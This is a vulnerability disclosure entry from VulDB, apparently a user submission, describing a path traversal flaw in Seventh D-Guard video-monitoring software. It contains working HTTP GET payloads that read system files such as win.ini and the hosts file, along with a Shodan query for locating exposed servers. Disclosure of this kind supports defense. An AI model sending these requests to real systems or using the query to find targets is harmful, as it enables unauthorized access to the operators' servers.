| Título | Seventh D-Guard NA Path Traversal |
|---|
| Descripción | URL Vendor: https://www.seventh.com.br/
Product:
https://www.seventh.com.br/solucoes/projetos-de-monitoramento/videomonitoramento
https://www.seventh.com.br/suporte/dispositivos-integrados/dguard
Directory Traversal is a vulnerability which allows attackers to access restricted directories and read files outside of the web server's root directory.
GET /../../../../../../../../windows/win.ini HTTP/1.1
Host: x.x.x.x:8081
Cookie: SessaoId=ZZIOVeZ5wHOgBm17gGXe
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36
Connection: Keep-alive
Readind /etc/hosts
GET /../../../../../../../../Windows/System32/Drivers/Etc/hosts HTTP/1.1
Host: x.x.x.x:8081
Cookie: SessaoId=ZZIOVeZ5wHOgBm17gGXe
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36
Connection: Keep-alive
Shodan Query:
https://www.shodan.io/search?query=Title%3A%22Web%22+Content-Length%3A+21928+country%3A%22BR%22+Content-Type%3A+text%2Fhtml%3B+charset%3DISO-8859-1&page=3
|
|---|
| Usuario | c4ng4c3ir0 (UID 38456) |
|---|
| Sumisión | 2025-02-06 18:29 (hace 1 Año) |
|---|
| Moderación | 2025-02-15 16:31 (9 days later) |
|---|
| Estado | Aceptado |
|---|
| Entrada de VulDB | 295965 [Seventh D-Guard hasta 20250206 HTTP GET Request recorrido de directorios] |
|---|
| Puntos | 17 |
|---|